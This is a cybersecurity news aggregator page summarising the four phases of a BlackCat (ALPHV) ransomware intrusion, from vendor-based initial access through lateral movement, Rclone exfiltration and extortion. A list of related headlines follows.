The Anatomy of a BlackCat (ALPHV) Attack – Cyber Security News Aggregator

# Phase 1: Initial Access and Foothold (days 1 – 5). The threat actor initiated the attack by first compromising the network of a third-party vendor, utilizing a local terminal server in the client’s network as a pivot point from which to launch the attack.

# Phase 2: Lateral Movement (days 6-20). The threat actor used several remote code execution techniques and the Cobalt Strike platform, to move laterally between the victim’s on-premises domains and Azure environment through RDP and tunneled connections. .

# Phase 3: Data Exfiltration and Additional Lateral Movement (days 27-30). Using the ‘Rclone’ tool, the threat actor exfiltrated a high volume of data from local servers to a cloud file storage service called ‘Wasabi’.

# Phase 4: Extortion Attempts (days 30-45). The threat actor flooded the victim with email messages threatening to publish sensitive information if a ransom was not paid, while exaggerating the volume and sensitivity of the stolen information.

https://www.sygnia.co/blog/blackcat-ransomware/

All articles related with “Blackcat” :

Tags: EMAIL, LATERAL MOVEMENT, INITIAL ACCESS, TOOL, CLOUD, EXFILTRATION

BlackCat ransomware shuts down in exit scam, blames the “feds”

Cyberattack Fallout: Minnesota Hospitals Grapple with Financial Strain

BlackCat ransomware turns off servers amid claim they stole $22 million ransom

Prescription Insecurity: The Russian Connection to Healthcare Cyber Attacks

BlackCat Ransomware Hit Healthcare Giant Optum, Stolen 6TB Sensitive Data

No Bad Luck for Darktrace: Combatting ALPHV BlackCat Ransomware | Darktrace Blog

BlackCat Ransomware Gang Claims Attack on Change Healthcare

BlackCat Ransomware Affiliate TTPs | Huntress

Pharmaceutical giant Cencora discloses a data breach